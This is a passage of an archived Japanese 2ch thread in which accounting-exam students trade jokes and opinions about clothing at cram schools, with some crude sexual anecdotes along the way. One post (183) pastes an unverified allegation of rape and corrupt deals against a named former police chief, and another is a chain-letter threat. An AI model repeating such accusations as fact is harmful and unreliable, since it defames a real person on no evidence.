学力と容姿はほぼ反比例するから・・・

151 :一般に公正妥当と認められた名無しさん:04/10/10 11:29:50 ID:???
意外とギャルが多いが
あれは金儲けしたいののステータスが欲しいだけか?
裏腹系のマスコミ粘着よりはマシだと思うが

152 :一般に公正妥当と認められた名無しさん:04/10/10 12:33:02 ID:???
>>147
相方は俺の地元ローカル番組でたまにでてくる
昔ぐっさんも出ていて近所で見かけた

153 :一般に公正妥当と認められた名無しさん:04/10/10 13:11:24 ID:???
ぐっさんの相方は一度引退したが中日に復帰したんだっけ?

154 :一般に公正妥当と認められた名無しさん:04/10/10 13:29:48 ID:???
川相のことか

155 :一般に公正妥当と認められた名無しさん:04/10/10 14:45:54 ID:???
ぐっさんの相方の平畑は売れ出したころも後輩(というのか知らんが)のはずの99に影が薄いといじられてたよ

156 :一般に公正妥当と認められた名無しさん:04/10/10 16:45:54 ID:???
>>155
年齢は99より上だが芸歴は99の方が長いから99の方が兄さん。

157 :一般に公正妥当と認められた名無しさん:04/10/10 20:07:54 ID:???
>特に男の子は、顔はあんま関係ない気がする。
顔そこそこでもおしゃれな人はすごくかっこ良く見える。

ブサイク必死だなw
顔が関係ないってオマエ馬鹿?



158 :一般に公正妥当と認められた名無しさん:04/10/10 21:29:12 ID:???
最近ユナイテッドアローズの紙袋持ってTACに来る香具師が多いが…
どうなのそこらへん?


159 :一般に公正妥当と認められた名無しさん:04/10/10 22:12:24 ID:aVm8L+WY
いいと思うよ。オシャレ過ぎず地味過ぎず、アローズやビームス、アンドエー辺りをテキトーに着とくのが無難だろ。

160 :一般に公正妥当と認められた名無しさん:04/10/10 22:17:20 ID:???
>>158
まぁ大学生でダブルスクールさせてもらってるか、もしくは無職のあつまりだ。
新品の服ならその辺と古着のミックスがラクでいいんでない?
それかラグタグ、やフ奥でそこそこのブランド物の中古をあさるかw

161 :一般に公正妥当と認められた名無しさん:04/10/10 22:23:36 ID:???
&Aは意外だな

162 :一般に公正妥当と認められた名無しさん:04/10/10 22:31:13 ID:???
&Aって知らないなぁw
アロー図、ビームス、ってきたら、ジャーナルスタンダード、シップすあたりのセレクトショップが続くのかと。
ラグシー・・・はちょっとずれてるかな??

163 :一般に公正妥当と認められた名無しさん:04/10/10 22:35:07 ID:aVm8L+WY
>>160
同感。俺は服買う時は大体昔着てた服をヤフオクで売ってから買うよ。多少の貯金はあるけどあんまし手つけたくないしね、何年かかるかわからんしw
古着ミックスいいよねー。全身古着は微妙だが適度に気が抜けてる感じは良い。


164 :一般に公正妥当と認められた名無しさん:04/10/10 22:37:03 ID:aVm8L+WY
アンドエーはラグシーと同じ系列で渋谷、新宿ともにラグシーのすぐ近くにある。
ラグシーが個性派なのに対してキレイめ、可愛い感じのアイテムが多いかなー。

165 :一般に公正妥当と認められた名無しさん:04/10/10 22:41:30 ID:???
アンドエーはサザビーの自社ブランド
アメラグとかアニエスとか買収している悪名高きサザビー

166 :一般に公正妥当と認められた名無しさん:04/10/10 23:05:43 ID:???
ヤフオクで買ったこと無いけどめちゃくちゃ汚れてたり、サイズがおもいのほか小さかったり、大きかったり
シャツなんてちぢんでたりしそうじゃない?
やっぱショップで買うのが一番だと思ってヤフオクは使ってない。
実際ヤフオクってどうなの?

会計士受かったら青山で買い物しまくるゾ!
いいスーツも買おう。。ディオールオムかグッチのスーツキボソヌ

167 :一般に公正妥当と認められた名無しさん:04/10/10 23:06:42 ID:???
洋服の青山

168 :一般に公正妥当と認められた名無しさん:04/10/10 23:10:11 ID:???
はるやま

169 :一般に公正妥当と認められた名無しさん:04/10/10 23:24:39 ID:???
コナカ

170 :一般に公正妥当と認められた名無しさん:04/10/10 23:29:09 ID:???
オシャレに気を遣うのマンドクセ
その金があればオプション講座を増やす

171 :一般に公正妥当と認められた名無しさん:04/10/10 23:35:06 ID:???
ほんとそうなんだよな…

172 :一般に公正妥当と認められた名無しさん:04/10/10 23:40:06 ID:???
そんなにオプションで申し込みたい講座ある??
漏れは普通のコースで十分すぎるんだが。
それでも理論はきつい・・・orz。

173 :一般に公正妥当と認められた名無しさん:04/10/11 00:03:41 ID:???
服よりも体形を気にする年になってしまった。

174 :一般に公正妥当と認められた名無しさん:04/10/11 01:24:55 ID:???
>>173

じゃあ、俺と同じ位の年か。

175 :一般に公正妥当と認められた名無しさん:04/10/11 01:29:09 ID:???
>>173-174
俺は論文結果発表待ちの間にジム行ってるぞ。
可愛いネーチャンの後姿見ながら一緒にエアロやったり、インストラクター(♂だったり♀だったり)にマンツーマンでついてもらって筋トレやったり。

今のうちしかないからな、ついてしまった脂肪を落とす時間は。

176 :一般に公正妥当と認められた名無しさん:04/10/11 02:31:52 ID:???
>>175
おれもジム行こうと思ってたんだが、
体が長い受験生活で弱りすぎてて、
筋トレが体にこたえる体になっちまって
三日坊主だ。やばい。

177 :一般に公正妥当と認められた名無しさん:04/10/11 02:37:50 ID:???
論文後は毎日ハーフマラソンしてる(雨の日除く)。
ジムで筋トレしてたら金髪のねーちゃんにご飯誘われて
その後、アイスがあるから家にこない?と言われた。
アイス食べた後、雰囲気的にHしないかと誘われた。
バックでついてるとき、ねーちゃんは片言の日本語で
「ワターシワ、シカーゴノ、アバレウシヨー」と叫んでいた。

178 :一般に公正妥当と認められた名無しさん:04/10/11 08:59:36 ID:???
不覚にも失笑してしまった

179 :一般に公正妥当と認められた名無しさん:04/10/11 09:39:28 ID:???
( ̄ー ̄)ニヤリッ

180 :一般に公正妥当と認められた名無しさん:04/10/12 20:46:10 ID:???
>>177 きんにくんのネタ使うなよ

181 :一般に公正妥当と認められた名無しさん:04/10/12 21:23:17 ID:???
>>176
一ヶ月で慣れるよ。がんがれ。

182 :一般に公正妥当と認められた名無しさん:04/10/13 07:43:03 ID:???
私は三越の紙袋さげていますよ

183 :一般に公正妥当と認められた名無しさん:04/10/13 08:37:11 ID:BZj1OoTm
藤井富雄 公明党都議
http://www.gikai.metro.tokyo.jp/giinmeibo16/k10a096.htm

http://www.jca.apc.org/~altmedka/ron-38-ya1.html
『新潮45』(1996.7)に、「オウム帝国の正体/完結編PART3/闇に葬られた警察情報」があります。この記事を要約し、実名を入れる
と、オウムと、暴力団と、地下鉄サリン事件当時の警察庁長官の前任者、元神奈川県警本部長、【城内康光】の間に、闇の取り引き
関係があったというものです。取り引き発生の原因は、城内康光が神奈川県警本部長時代に、部下で、しかも警察官の娘を、自分の
宿舎の掃除中に強姦し、腹心の部下の揉み消し工作により愛人にしており、そのことを暴力団が知り、それが、オウムの前身の神仙
の会事件の捜査中止の取り引き材料となったというものです。


184 :一般に公正妥当と認められた名無しさん:04/10/13 12:15:53 ID:???
〉〉177
これを実話と思い込んでしまうのは重過失でつか?

185 :175:04/10/13 22:14:25 ID:???
>>184
話半分で聞いておいた方がいいでしょう。


でも、週5でジムに通って、
エアロビクスとか、ファイティングとかのプログラムと、
エアロバイクなどの有酸素運動、筋トレと組み合わせてやったら、

明後日で一ヶ月だけれど、ベルトの穴が2つも縮んだよ・・。

胸の脂肪で出来た擬似おっぱいもなくなったし・・。


まぁまだまだお腹や背中に脂肪はたくさんあるけどな。

186 :一般に公正妥当と認められた名無しさん:04/10/13 22:44:09 ID:???
つーか、金髪のねえちゃんに、
>「ワターシワ、シカーゴノ、アバレウシヨー」
などというたわけた日本語を教えたやつって神?w

もしくは、仮にネタだったとして、こんなオチを思いつく椰子って一体・・・w


187 :一般に公正妥当と認められた名無しさん:04/10/13 22:50:10 ID:???
>>186

http://www.uwasa.tv/bbs/boo/ibbs.php?page=50
の一番下。

↓はグーグルのキャッシュ
http://www.google.co.jp/search?q=cache:Z-90Hh9nwJUJ:www.uwasa.tv/bbs/boo/ibbs.php%3Fpage%3D50+%E3%81%8D%E3%82%93%E3%81%AB%E3%81%8F%E3%82%93%E3%80%80%E3%82%B7%E3%82%AB%E3%82%B4&hl=ja

188 :一般に公正妥当と認められた名無しさん:04/10/15 09:41:05 ID:???
なかやまきんにくんってすごいね。

189 :一般に公正妥当と認められた名無しさん:04/10/21 19:44:55 ID:lL2iskKA
社会の窓全開です。

190 :一般に公正妥当と認められた名無しさん:04/10/22 08:00:26 ID:???
リュック背負って亀仙人

191 :一般に公正妥当と認められた名無しさん:04/10/31 16:47:33 ID:???
みんな少しオサレになったと思う

192 :一般に公正妥当と認められた名無しさん:04/11/01 22:29:26 ID:???
無職のくせにビトンとか使うな

193 :一般に公正妥当と認められた名無しさん:04/12/17 00:10:57 ID:???
クリスマスの予備校ファッションは?
今年のトレンド教えれ〜

194 :一般に公正妥当と認められた名無しさん:04/12/17 00:28:49 ID:es25L71G
紺ブレにケミカルウオッシュ

195 :一般に公正妥当と認められた名無しさん:04/12/17 10:42:52 ID:???
渋カジじゃん

196 :一般に公正妥当と認められた名無しさん:04/12/17 17:30:32 ID:???
ぶっちゃけね、臭くなければなんでもいいですよ・・・。

197 :一般に公正妥当と認められた名無しさん:04/12/18 20:46:53 ID:AWvXENSM
ふけもやめてほしい。
ヴェテっぽい奴の頭に離れてもわかるほどすごい量のフケがわいててキモかった

198 :一般に公正妥当と認められた名無しさん:04/12/18 21:30:36 ID:???
とりあえずね、小奇麗にしといてもらえればなんでもいいですよ・・・。

199 :OTL:04/12/18 23:26:58 ID:RCckuaFX
最近簿記論の講義で一緒になるオサレな若者がいる。
平日は仕立てのヨサゲなスーツで颯爽と現れ、休日の自習室では素人目にも恰好いい私服を身に纏っている。
嫌味じゃなくいい香りを漂わせ、腕時計はベタだが白のデイトナ。

漏れは大学時代からのいわゆる税理士ベテで、無職3年目3科目。
彼は去年財表と固定を取ったらしい。

何か知らんが意気投合して飲みに行くことに。
コネもあるらしいが彼は25歳にして大きい会社の役員。
K応卒なんだが勢いで役員まで昇りつめたとのこと。

200 :一般に公正妥当と認められた名無しさん:04/12/18 23:38:21 ID:???
25歳で大きい会社の役員はネタ

201 :OTL:04/12/18 23:38:50 ID:RCckuaFX
慶Oでは経済学を専攻してたらしい。
なぜそんな人が税理士を?と聞いた。

若いというだけで銀行や取引先とのやりとりで舐められる。
相手は舐めてるつもりはないんだろうが、勢いでここまできたから、
まだ自分に自信がもてないからそう感じてしまうのかも。
仕事しながら会計士は無理だし、税理士くらいを押さえておけば形になるかなと思って。
自己満足ですねw
あ…○○さん←漏れね、マジすみません←本気

202 :OTL:04/12/18 23:43:44 ID:RCckuaFX
漏れはダサくはないと思うが、所詮無職のベテ

彼はオサレで頭が良くて、背も高くて社会的地位もあって、年収も凄くて…イケメン←袴田吉彦似
腰も低くて、もの凄くいい奴だし、チンコもデカイくてセックスもうまいらしい←クラスの娘に聞いた

ちなみにその娘は漏れがひそかに憧れてた子…
死にたくなったOTL

漏れにはもうオサレする気力も無くなったよ

203 :一般に公正妥当と認められた名無しさん:04/12/18 23:45:53 ID:???
>>202
ネタありがとう、おもろかった。以上会計士受験生でしたってオチでしょ。

204 :OTL:04/12/18 23:52:12 ID:RCckuaFX
>>203
ネタか…それもいいな

でもわりとマジなんだよね。
田舎だと慶O卒ってだけで凄いステータスだから。

大きいっつっても従業員200くらいの会社だよ。
親会社の社長の甥なんだってさ。将来確定してる…裏山すぃ(´・ω・`)

205 :一般に公正妥当と認められた名無しさん:04/12/19 00:06:58 ID:???
チンコもデカイくてセックスもうまいらしい←クラスの娘に聞いた

そんなこと話す女は嫌だ

206 :一般に公正妥当と認められた名無しさん:04/12/19 00:08:31 ID:???
>大きいっつっても従業員200くらいの会社だよ。

それは大きい会社とは言わんだろう。つーか、そんなことだろうと思ったw

207 :一般に公正妥当と認められた名無しさん:04/12/19 00:16:25 ID:???
中小企業といいます
しかも親戚の会社かよ

208 :OTL:04/12/19 00:18:56 ID:WCgVtMwM
>>206
お互いとりあえず就職しようぜФ(..;)
あ、就職してたらスマソ。

200人てのは大きい会社な気がするよ。少なくとも漏れ的には。
25歳で200人弱を使うってのが想像つかんし。
そんな漏れは彼より年上。
先にはもっと大物になりそうだから仲良くしとく。
…こういう打算は最悪かもしれんが(´・ω・`)

オサレは捨てずにとっとと税理士に合格しよう!
あと2年以内(弱気)

209 :OTL:04/12/19 00:22:16 ID:WCgVtMwM
>>205
軽いノリは嫌いなのか?

見た目は林エリカ(マイナーAV女優、知らなきゃ調べて)に似て可愛いんだよね。
つーかエロさが漏れ好み。

210 :一般に公正妥当と認められた名無しさん:04/12/19 00:33:28 ID:???
>チンコもデカイくてセックスもうまい
普通こんなこと言うか??どんな感じでいわれたん?

211 :OTL:04/12/19 00:42:10 ID:WCgVtMwM
>>210
この子がまたオサレでいい子なんだ。税理士受ける女の子には珍しく。
軽いノリで話せる子だけど聞いたのはさすがに直球じゃないよ。
飲みつつ質問形式で聞き出した。

やったの?みたいな話からどうだった?ってな感じの軽いノリでね。
ひそかにやってないことを祈ってたんだが、生々しい話が聞けたよ(;゚д゚)ハアハア
また落ちてきた…OTL

212 :一般に公正妥当と認められた名無しさん:04/12/19 00:53:01 ID:???
>>211
そいつがやれたんならあんたもやれるで。
しかしクラスで関係もつことあるのか、こっちはそういう雰囲気
じゃないなぁ。はりあいがあっていいなぁ。

213 :一般に公正妥当と認められた名無しさん:04/12/19 00:53:51 ID:???
慶応卒で親戚の会社に入社して
税理士受けるってモロに負けだと思うが

214 :OTL:04/12/19 01:44:05 ID:WCgVtMwM
>>212
優しい言葉に感動した(:д;)

嬉しいので会話を再現してみる
女の子:エリカ(仮名)
オサレ男:袴田(仮名)

飲み会にて…会話が盛り上がり、男女の話へ
(前省略)
漏れ『最近袴田と仲よくねえ?カッコイイって言ってたし、よかったな』
エリカ『…付き合うことになるかも』
漏れ(マヌケ顔で)『は?なんかあった?』
エリカ『ウン…』
漏れ『ヤっちゃったとか?まさかな(汗)』
エリカ『まさかねぇ(笑)』
漏れ『だよな!(テンション上がり気味)んで、どーしたの?』
エリカ『こないだ二人で飲みに行ったんだ、袴田クンに誘われて』

215 :一般に公正妥当と認められた名無しさん:04/12/19 01:52:51 ID:???
勝ちだの負けだの・・・

216 :OTL:04/12/19 01:53:00 ID:WCgVtMwM
漏れ『ふーん、そうなんだ。楽しかった?』
エリカ『うん、まあね』
漏れ『で、なにが?』
エリカ『実はその後にね、彼の家に行ったんだ』
漏れ『(泣き笑い)でもやってねーんだろ?』
エリカ『実はちょっとね(笑)』
漏れ『ちょっとってどんくらい?B?C?(壊れた。中学生か漏れはw)』
エリカ『実は最後までしちゃったんだよね』
漏れ『さっきしてねーっつったのに。嘘かよw(まだ壊れてる、三村調)』
エリカ『うん』
漏れ『じゃあ付き合うんだ?よかったじゃん』
エリカ『でもそーゆー感じじゃないんだよね』
漏れ『どんな感じなの?』

217 :OTL:04/12/19 02:02:49 ID:WCgVtMwM
エリカ『袴田クンは遊びっぽいんだよねー、遊びなら遊びでいいんだけど』
漏れ『(冷静になりつつ)遊びかあ…じゃあ今度漏れとも遊んでよ』
エリカ『やだよー○○←漏れ、好みじゃないもん』
…とここで一度死んだ。

頑張って復活。
漏れ『(再び泣き笑い)そうか、だよなー。袴田は好みだもんな。セックスもうまそうだし。』
エリカ『ウマー(・д・)』
漏れ『マジで?チン○とかでけーの?ガタイいいから凄そうだけど。』
エリカ『ウマー(・д・)』
漏れ『そうか、お互い割り切れてんなら付き合う必要なくない?SFとかさ。』

218 :OTL:04/12/19 02:08:32 ID:WCgVtMwM
エリカ『うん、でも好きになっちゃったかも。女って一回しちゃうとそういうトコあるし』
漏れ『じゃあ漏れと…』
エリカ『それは無理。そーゆー問題じゃない』(やや怒り気味)
漏れ『(涙目)そうだよなーよし今度袴田と話してみるよ』
エリカ『ありがd』

…脚色ありだが大体こんな感じ。

思い出したらもう人として恥ずかしくなってきた。
もうだめぽ…OTL

スレ大違いスマソ。もう逝きます。

219 :一般に公正妥当と認められた名無しさん:04/12/19 02:28:55 ID:???
飲んでるの?w

220 :一般に公正妥当と認められた名無しさん:04/12/19 02:32:22 ID:???
>>218
客観的に読んだけど頑張ればなんとかなりそうな感じだよ。
たぶん袴田としては絶対遊びだから女が落ち込んでる時が
絶好のチャンスだね。たなぼた状態だよ、いいなぁ。

221 :一般に公正妥当と認められた名無しさん:04/12/19 02:45:54 ID:???
世界に女は星の数ほどいるさ

222 :一般に公正妥当と認められた名無しさん:04/12/19 02:47:46 ID:plEWDkcw
?       ?.
      ??     ??
    ????   ????
   ??????????????
 ?????????????????
 ?????????????????
 ?????????????????
 ?????????????????
  ???????????????
    ????????????
  ???????????????
 ?????????????????
 ?????????????????
 これを見ると今年の受験に落ちます。
これを今から1時間以内に3回他スレにコピペすれば100%、受かります。
貼らないと
落  ち  ま  す


223 :一般に公正妥当と認められた名無しさん:04/12/19 14:52:34 ID:uWqDq6e6
>>218
まあその内にきっといいことがあるさw

ところで今日自習室に作業服のオサーンがいた。休日なのに着る服ねーんかな?

作業服はさすがにどうかと思う。
汚そうで近くに座りたくなかった。

224 :一般に公正妥当と認められた名無しさん:04/12/19 17:03:53 ID:???
林エリカ見てみたけど劇キモ
まあおまえには合ってるのだろうが

225 :一般に公正妥当と認められた名無しさん:04/12/19 17:09:07 ID:WCgVtMwM
林エリカは知らんが、オマイの女よりマシだろ。てか女いねーかw

226 :一般に公正妥当と認められた名無しさん:04/12/19 23:05:09 ID:???
>>215
さいしょにいいだしたのはだれなのかしら

227 :一般に公正妥当と認められた名無しさん:04/12/21 02:30:02 ID:???
ttp://homepage3.nifty.com/erika-angel/
この格好で自習するのが一番はかどると思うよ。ほんとだよ。

228 :一般に公正妥当と認められた名無しさん:04/12/21 17:04:20 ID:???
エリカとチョメチョメ

229 :一般に公正妥当と認められた名無しさん:04/12/21 22:29:46 ID:???
まあやってる本人は楽しいんだろうけど、きっついなー

12月だってのに半袖のヤシが
俺のいた教室だけで4人もいた。
こっちは寒くてコート着ながら勉強してたのに。
眠け醒まし?

230 :一般に公正妥当と認められた名無しさん:04/12/22 09:48:12 ID:VszPT+Zf
半袖はキツイだろ…今日とか凄い冷えるし。
通学も半袖だったらネ申

231 :一般に公正妥当と認められた名無しさん:04/12/22 10:28:27 ID:???
ウニ黒買うぐらいならgap買えばいいじゃん
値段変わらないしウニみたいにばれやすくないし


232 :一般に公正妥当と認められた名無しさん:04/12/22 14:04:44 ID:Df1euUQS
gap買うぐらいならdior買えばいいじゃん
値段変わらないしgapみたいに安っぽくないし

233 :一般に公正妥当と認められた名無しさん:05/02/05 15:43:47 ID:kR4bTBr4
age

234 : :05/02/07 07:59:42 ID:???
勉強し易い差し障りのない服装が良い、目的は勉強。休みの日はオニカジ、ピアスまみれのチャラオ。

235 :一般に公正妥当と認められた名無しさん:05/02/18 08:55:21 ID:WNTgQVLc
いし

236 :一般に公正妥当と認められた名無しさん:05/02/18 15:51:38 ID:iXeqm3WT
授業はいつも同じズボンに同じシャツは流石にヤバイですかね?

237 :一般に公正妥当と認められた名無しさん:05/02/18 16:10:28 ID:???
悪臭を放ってさえいなければ無問題。藻舞が日々どんな服装で来ようが誰も気にしてないから。

238 :一般に公正妥当と認められた名無しさん:05/02/18 21:45:09 ID:Z5kWrRlj
>236

いつも授業で同じ前の席座ってるときに、同じ服だと、
同じ教室の香具師にかなり覚えられる。
この前、はじめて話した女に、あなたいつも〜〜色の服着た人ですねっとか
言われて恥ずかしかったよ

239 :一般に公正妥当と認められた名無しさん:05/02/18 22:37:40 ID:iXeqm3WT
>>237
なるほど。。。ただズボンを洗ったのですが雨が降ってきたため乾燥機に掛けて半乾きの状態で
穿いていったら、湿気臭い臭いがした事は数回あります。
>>238
なるべく後ろに座るようにしています。

>あなたいつも〜〜色の服着た人ですね
私はこのような事は他人に言ってはいけないと小学校の頃教わりました。

240 :一般に公正妥当と認められた名無しさん:05/02/19 01:54:37 ID:???
>あなたいつも〜〜色の服着た人ですねっ

まぁ、思ってても実際本人には普通言わないよな。


241 :一般に公正妥当と認められた名無しさん:05/02/19 03:52:48 ID:???
>>239
洗ってる間のもう一着ぐらいは買おうぜ。
2000円ぐらいであるだろ。


242 :一般に公正妥当と認められた名無しさん:05/02/19 04:23:20 ID:???
いや、1000円でもあるんじゃないか。

243 :一般に公正妥当と認められた名無しさん:05/03/14 23:04:02 ID:???
マルエツで買った1050円のアルマーニタイプのジャケット

244 :一般に公正妥当と認められた名無しさん:05/03/14 23:05:27 ID:???
>384
うぅっ、やっぱりそうでしたか・・。
友人から種をもらったので軽い気持ちで育ててしまいましたが、
よく考えれば当たり前ですよね・・。

しかし、成体になるまで育ててしまったものを今さらどうしていいのやら・・
日曜の朝、エサを用意しわすれてでかけたら、
夜帰った時には80cm以上も移動していました・・・。

245 :一般に公正妥当と認められた名無しさん:05/03/14 23:40:43 ID:???

誤爆?

246 :一般に公正妥当と認められた名無しさん:05/03/15 15:27:13 ID:???
何を育てたんだろう…
気になる

247 :一般に公正妥当と認められた名無しさん:05/03/16 18:41:24 ID:???
>夜帰った時には80cm以上も移動していました・・・。
これが>種をもらったので軽い気持ちで育ててしまいましたが
と激しく矛盾している希ガス

248 :一般に公正妥当と認められた名無しさん:05/03/16 19:22:24 ID:???
かぐや姫

249 :一般に公正妥当と認められた名無しさん:2005/04/29(金) 18:57:46 ID:???
作務衣

250 :一般に公正妥当と認められた名無しさん:2005/05/06(金) 09:10:35 ID:oLsi0IZM
所詮勉強するところなんやからカッコエエ服なんかイラン


251 :一般に公正妥当と認められた名無しさん:2005/05/06(金) 12:52:30 ID:???
>>247
マンドラゴラでも育ててるんじゃね?

252 :一般に公正妥当と認められた名無しさん:2005/05/07(土) 08:41:53 ID:???
ダンブルドア先生それいいすぎ!

253 :一般に公正妥当と認められた名無しさん:2005/05/08(日) 18:12:49 ID:???
ホグワーツの生徒か

254 :一般に公正妥当と認められた名無しさん:2005/05/08(日) 22:41:34 ID:???
ノーマルスーツ

255 :一般に公正妥当と認められた名無しさん:2005/05/09(月) 04:18:24 ID:xke+nrzu
レイバーパンツ

256 :一般に公正妥当と認められた名無しさん:2005/05/11(水) 18:30:24 ID:???
パワードスーツ

257 :一般に公正妥当と認められた名無しさん:2005/05/12(木) 01:20:09 ID:???
レイバーは特殊車両で、着るもんじゃないから、スレ違いだよね・・・。

258 :一般に公正妥当と認められた名無しさん:2005/05/14(土) 23:28:52 ID:???
予備校は勉強するところなんだからファッションに金なんかかけんでいい
極端な話裸でもいい


259 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 00:14:09 ID:???
>極端な話裸でもいい

周囲の迷惑というか、公序良俗のことも少しは考えてくらさい。

260 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 05:54:05 ID:???
いい女ならゆるす

261 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 15:09:39 ID:???
森○中の裸見て鼻血ブーーーーーーー!!!


262 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 19:06:03 ID:???


263 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 23:11:28 ID:???
迷彩服で答練受けてる勘違いヲタがいるね

264 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 23:14:48 ID:???
性欲を持て余してんだよW

265 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 23:17:55 ID:???
今年駄目だったら自衛隊へ入隊するんだよ。

266 :一般に公正妥当と認められた名無しさん:2005/05/15(日) 23:23:17 ID:???
「全日本プロレス」のTシャツを来た、いかにも格闘技ヲタの女もいる

267 :一般に公正妥当と認められた名無しさん:2005/05/21(土) 22:17:57 ID:???
あのニート君そっくりのニートが7人ほどいる。
7人とも色違いだけど似たようなチェックの半袖シャツにジーンズ姿。

268 :一般に公正妥当と認められた名無しさん:2005/06/13(月) 22:13:43 ID:???
光学迷彩

269 :一般に公正妥当と認められた名無しさん:2005/06/14(火) 21:09:29 ID:???
破裏拳ポリマー

270 :一般に公正妥当と認められた名無しさん:2005/06/14(火) 22:49:01 ID:???
>>257
クラブのパーティー逝ってる奴らが履いてるような派手な太いパンツのこと。

271 :一般に公正妥当と認められた名無しさん:2005/06/14(火) 23:03:33 ID:???
スクリーミング・ロード・サッチのTシャツにGパン、ロンブー。

272 :一般に公正妥当と認められた名無しさん:2005/06/15(水) 00:16:44 ID:MKOdohpR
アロハ

273 :一般に公正妥当と認められた名無しさん:2005/06/15(水) 00:31:50 ID:???
>>269
なんて読むの?

274 :一般に公正妥当と認められた名無しさん:2005/06/15(水) 00:32:40 ID:???
ジーパンにシャツ

275 :一般に公正妥当と認められた名無しさん:2005/06/15(水) 10:23:18 ID:???
ケミカルウォッシュのジーンズに
チェック柄のネルシャツをin。

276 :一般に公正妥当と認められた名無しさん:2005/06/15(水) 13:06:53 ID:???
>>275
inって裾をズボンにしまうという意味か?

277 :一般に公正妥当と認められた名無しさん:2005/06/16(木) 00:14:38 ID:???
爽やかなダンガリーシャツに、かっこいいバミューダパンツを合わせる。
もちろんダンガリーシャツはin。

278 :一般に公正妥当と認められた名無しさん:2005/06/17(金) 05:38:02 ID:???
>>273
はりけんぽりまー
確か「キャシャーン」の後番組だったな

279 :一般に公正妥当と認められた名無しさん:2005/06/17(金) 05:46:57 ID:???
ゲスのジーンズに、トップスは素肌にラルフローレンのVネックセーター
。金メッキのネックレスをして、時計はROMEX。カンゴールのハンチ
ングを深くかぶり、レイパンのサングラスをかける。

そして毎日中古(5万)のローレルからお気にのJ−ラップを流す。

280 :一般に公正妥当と認められた名無しさん:2005/06/18(土) 23:38:28 ID:???
>>279
かこいいな。
今度TAC水道橋の5回の休憩室で会おうぜ!

281 :一般に公正妥当と認められた名無しさん:2005/06/22(水) 00:32:07 ID:???
昔俺が通っていた校舎にいた女の子で、毎日同じ格好の子がいたよ。
たまに違う服を着ているかと思ったら、しばらくその服が続く。
たぶん、その二着しかもってない。
女の子でここまで腹をくくって勉強できるなんてたいしたもんだと思ったよ。

282 :一般に公正妥当と認められた名無しさん:2005/06/22(水) 17:23:10 ID:???
>>281
そりゃすごいね。
でも何日も風呂入ってないのは男女問わず近寄りたくない

283 :一般に公正妥当と認められた名無しさん:2005/06/22(水) 22:35:01 ID:???
>>281
女の子は勉強にしてもプライベートにしても割り切りが上手いからね。
そうやって目標に向けてポリシーを徹底するから、受験でも実務でも比較的レベルアップが早い。
風呂なし着替えなしの是非はともかく、集中力という部分では見習うところが多いね。

284 :一般に公正妥当と認められた名無しさん:2005/06/23(木) 20:08:03 ID:???
股上深いパンツにタックインしてる奴まじきもい。
あえてやってるとは思えない。
所謂お兄系めざしてる感じだから。


59 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)